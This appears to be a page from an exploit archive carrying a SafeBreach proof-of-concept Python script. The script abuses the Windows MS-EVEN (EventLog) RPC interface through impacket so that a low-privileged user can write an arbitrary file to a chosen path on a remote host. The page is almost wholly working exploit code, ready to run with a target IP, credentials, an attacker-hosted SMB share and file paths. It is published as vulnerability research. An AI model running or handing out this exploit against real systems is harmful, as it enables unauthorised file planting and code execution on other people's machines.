4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / write_file_remotely.py PY
"""
@Author: Yarin A.
@Company: SafeBreach
@Description:   This script is using the write primitive given by MS-EVEN,
                in order to execute code over SMB using low-privileged user.
"""

import os
import shutil
import argparse

from impacket.dcerpc.v5 import even
from impacket.dcerpc.v5.dtypes import RPC_UNICODE_STRING
from impacket.dcerpc.v5.transport import DCERPCTransportFactory


class Attacker:

    LOG_MSG_TEMPLATE = r"[+] - {message}"
    EVENT_LOG_NCACN = r"ncacn_np:{ip}[\pipe\eventlog]"
    RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
    SAMPLE_EVTX_FILENAME = r"Sample.evtx"
    TEMP_EVTX_FILE_TEMPLATE = r"Temp_{valid_evtx_file}"
    SHARE_PATH = r"\\{smb_server_ip}\Share\{local_file_path}"

    def __init__(self, ip, username, password, smb_server_ip):

        self.smb_server_ip = smb_server_ip

        self.log("Initializing Connection...")
        self.connection = DCERPCTransportFactory(self.EVENT_LOG_NCACN.format(ip=ip))

        self.log("Authenticating...")
        self.connection.set_credentials(username, password)
        self.connection.connect()

        self.dce = self.connection.get_dce_rpc()
        self.dce.set_auth_level(self.RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        self.dce.connect()

        self.log("Binding MS-EVEN Interface...")
        self.dce.bind(even.MSRPC_UUID_EVEN)

    def create_rpc_unicode_string(self, regular_string):

        crafted_unicode_string = RPC_UNICODE_STRING()
        crafted_unicode_string["Data"] = regular_string
        crafted_unicode_string.fields["MaximumLength"] += 1
        return crafted_unicode_string

    def create_target_evtx(self, src):
        file_name = os.path.basename(src)
        dest_name = self.TEMP_EVTX_FILE_TEMPLATE.format(valid_evtx_file=file_name)
        shutil.copy(src, dest_name)
        return dest_name

    def cleanup(self, file_path):
        if os.path.exists(file_path):
            os.remove(file_path)

    def upload_file(self, local_file_path, remote_file_path, valid_evtx_file_path):

        temp_valid_evtx_file = self.create_target_evtx(valid_evtx_file_path)

        file_path_in_share = self.SHARE_PATH.format(
            smb_server_ip=self.smb_server_ip,
            local_file_path=os.path.basename(temp_valid_evtx_file),
        )
        unicode_valid_evtx_share_path = self.create_rpc_unicode_string(
            file_path_in_share
        )
        unicode_remote_path = self.create_rpc_unicode_string(remote_file_path)

        self.log("Starting upload to {0}".format(remote_file_path))

        local_file_path_data = open(local_file_path, "rb").read()

        with open(temp_valid_evtx_file, "rb+") as valid_evtx_file:
            handle = even.hElfrOpenBELW(self.dce, unicode_valid_evtx_share_path)

            valid_evtx_file.seek(0)
            valid_evtx_file.write(local_file_path_data + b"\x00")
            valid_evtx_file.flush()
            even.hElfrBackupELFW(self.dce, handle["LogHandle"], unicode_remote_path)

        self.log("Done!")

    def close_connection(self):
        self.log("Disconnecting...")
        self.dce.disconnect()

    def log(self, message):
        print(self.LOG_MSG_TEMPLATE.format(message=message))


def main():

    parser = argparse.ArgumentParser()

    parser.add_argument("ip_to_attack")
    parser.add_argument("smb_server_ip")
    parser.add_argument("username")
    parser.add_argument("password")
    parser.add_argument("valid_evtx_file_path")
    parser.add_argument("local_file_path")
    parser.add_argument("remote_file_path")

    args = parser.parse_args()

    attacker = Attacker(
        args.ip_to_attack,
        username=args.username,
        password=args.password,
        smb_server_ip=args.smb_server_ip,
    )

    attacker.upload_file(
        local_file_path=args.local_file_path,
        remote_file_path=args.remote_file_path,
        valid_evtx_file_path=args.valid_evtx_file_path,
    )
    attacker.close_connection()


if __name__ == "__main__":
    main()